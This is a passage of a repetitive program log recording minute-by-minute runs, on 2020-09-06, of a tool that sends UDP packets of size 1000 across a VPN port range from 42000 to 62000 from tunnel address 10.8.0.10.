6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:12:05 -Starting port fill at 2020-09-06 10:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:13:04 -Starting port fill at 2020-09-06 10:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:14:04 -Starting port fill at 2020-09-06 10:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:15:06 -Starting port fill at 2020-09-06 10:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:16:06 -Starting port fill at 2020-09-06 10:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:17:04 -Starting port fill at 2020-09-06 10:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:18:04 -Starting port fill at 2020-09-06 10:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:19:05 -Starting port fill at 2020-09-06 10:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:20:04 -Starting port fill at 2020-09-06 10:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:21:06 -Starting port fill at 2020-09-06 10:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:22:04 -Starting port fill at 2020-09-06 10:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:23:07 -Starting port fill at 2020-09-06 10:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:24:06 -Starting port fill at 2020-09-06 10:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:25:05 -Starting port fill at 2020-09-06 10:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:26:07 -Starting port fill at 2020-09-06 10:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:27:07 -Starting port fill at 2020-09-06 10:28:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:28:06 -Starting port fill at 2020-09-06 10:29:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:29:05 -Starting port fill at 2020-09-06 10:30:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:30:06 -Starting port fill at 2020-09-06 10:31:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:31:05 -Starting port fill at 2020-09-06 10:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:32:06 -Starting port fill at 2020-09-06 10:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:33:05 -Starting port fill at 2020-09-06 10:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:34:04 -Starting port fill at 2020-09-06 10:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:35:04 -Starting port fill at 2020-09-06 10:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:36:06 -Starting port fill at 2020-09-06 10:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 10:37:06 -Starting port fill at 2020-09-06 10:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 10:38:06 -Starting port fill at 2020-09-06 10:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 